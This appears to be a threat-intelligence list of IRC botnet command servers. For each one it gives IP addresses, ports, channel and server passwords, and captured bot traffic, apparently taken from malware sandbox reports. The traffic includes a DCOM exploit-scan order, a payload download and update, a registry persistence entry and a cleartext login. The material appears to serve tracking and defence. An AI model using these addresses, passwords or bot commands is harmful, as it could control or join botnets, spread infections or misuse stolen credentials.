95.154.242.89

95.154.242.89:4244″ “:HTTP1.4 302 FRA|2045414 :FRA|2045414=+gfgjbblu@41.141.112.125 :FRA|2045414!gfgjbblu@41.141.112.125 JOIN :##neo## :HTTP1.4 332 FRA|2045414 ##neo## :&psniff on :HTTP1.4 333 FRA|2045414 ##neo## Coded 1288523091 :HTTP1.4 302 FRA|2045414 :FRA|2045414=+gfgjbblu@41.141.112.125 :HTTP1.4 302 FRA|2045414 :FRA|2045414=+gfgjbblu@41.141.112.125 “

72.20.51.198

72.20.51.198:6667″: – “JOIN #die chanpass MODE [FRA|00|P|88890] -ix JOIN #die chanpass MODE [FRA|00|P|88890] -ix JOIN #die chanpass MODE [FRA|00|P|88890] -ix JOIN #die chanpass “

Fooker.net

78.129.228.56:65267: – “JOIN #NzM# screwu nick:[M]ESP|00|XP|SP3|9898708 [M]ESP|00|XP|SP3|3576563 #NzM# :.root.start dcom135 200 0 0 219.x.x.x -a -r -s :Fooker.net 333 [M]ESP|00|XP|SP3|3576563 #NzM# weebz

1.sarkievi.net

Remote Host Port Number 212.175.158.43 6667 PASS lnx Resolved : [1.sarkievi.net] To [212.175.158.43] MODE [00|USA|227819] -ix JOIN #Cd# NhG NICK [00|USA|227819] USER XP-7853 * 0 :COMPUTERNAME Now talking in #Cd# Topic On: [ #Cd# ] [ .msn.msg Foto 😀 http://to.ly/7Lkw?= ] Topic By: [ Samuray ] Other details * The following port was open in

46.4.245.19

Remote Host Port Number 46.4.245.19 6667 NICK n{USA|XP}303134 USER 3031 “” “TsGh” :3031 JOIN #Awesome leonanenad15963 PONG :BoTNeT.GoV Other details * The following port was open in the system: Port Protocol Process 1053 TCP taskeng.exe (%AppData%taskeng.exe) Registry Modifications * The newly created Registry Values are: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + Windows Update System = “%AppData%taskeng.exe” so that

109.235.49.236

Remote Host Port Number 109.235.49.157 80 109.235.49.236 21 109.235.49.236 35254 * The data identified by the following URLs was then requested from the remote web server: o http://global-blog.net/2.php?p1=COMPUTERNAME_cnew05ORTN&p2=.. o http://global-blog.net/2.php?p1=COMPUTERNAME_cnew05ORTN&p2=. USER rnew05@net4speed.net USER cnew05@net4speed.net 00000000 | 5041 5353 2063 6E25 7724 7033 3364 4021 | PASS cn%w$p33d@! 00000010 | 40E0 E133 3432 0D0A 5057 440D

67.202.108.130

Remote Host Port Number 67.202.108.130 6567 s1m0n3t4 67.202.109.164 80 MODE [SI|USA|00|P|34779] -ix JOIN #nuevocsm# c1rc0dus0leil PRIVMSG #nuevocsm# :[Dl]: File download: 84.0KB to: C:DOCUME~1UserNameLOCALS~1Temperaseme_83035.exe @ 84.0KB/sec. QUIT [Update]: Updating to new bin. NICK [SI|USA|00|P|51927] USER XP-2630 * 0 :COMPUTERNAME MODE [SI|USA|00|P|51927] -ix JOIN #xd# c1rc0dus0leil NICK [SI|USA|00|P|34779] USER XP-7375 * 0 :COMPUTERNAME MODE [SI|USA|00|P|38552] -ix JOIN

200.164.228.252(Slice’s botnet)

Remote Host Port Number 200.164.228.252 31337 pass 1a2z3a4za6z5s6x5 NICK ^[USA]-[XP-SP2]-069721 USER 1360 “” “lol” :1360 PONG :412CF8FD JOIN #jklolimawasp## 1a2z3a4za6z5s6x5 PRIVMSG #jklolimawasp## : Bot killed from the system! Now talking in #jklolimawasp## Topic On: [ #jklolimawasp## ] [ !msn lol omfg. watch this http://www.ibrokemyinter.net/clips/ ] Topic By: [ nickserv ] Modes On: [ #jklolimawasp## ]

61.86.5.250

Remote Host Port Number 61.86.5.250 3305 PASS secretpass NICK P|vd0dk5h1i USER s0ppm59wh * 0 :USA|XP|549 USERHOST P|vd0dk5h1i MODE P|vd0dk5h1i JOIN #s echo Other details * The following ports were open in the system: Port Protocol Process 1057 TCP uninstall_.exe (%FontsDir%uninstall_.exe) 1089 TCP uninstall_.exe (%FontsDir%uninstall_.exe) 1090 TCP uninstall_.exe (%FontsDir%uninstall_.exe) 1091 TCP uninstall_.exe (%FontsDir%uninstall_.exe) 1092 TCP uninstall_.exe

updateserver.net(Burimi big hecker)

Remote Host Port Number 109.123.108.61 81 ircd here 200.54.145.171 81 ircd here 88.208.209.166 81 ircd here 67.195.140.222 80 Resolved : [updateserver.net] To [88.208.209.166] Resolved : [updateserver.net] To [109.123.108.61] PONG :hub.not.found NICK n[USA|XP|COMPUTERNAME]ajudsuq USER n “” “lol” :n JOIN #biz# PONG 422 NICK n[USA|XP]1167074 PONG :request2.not.found USER s “” “lol” :s JOIN #newbin# * The data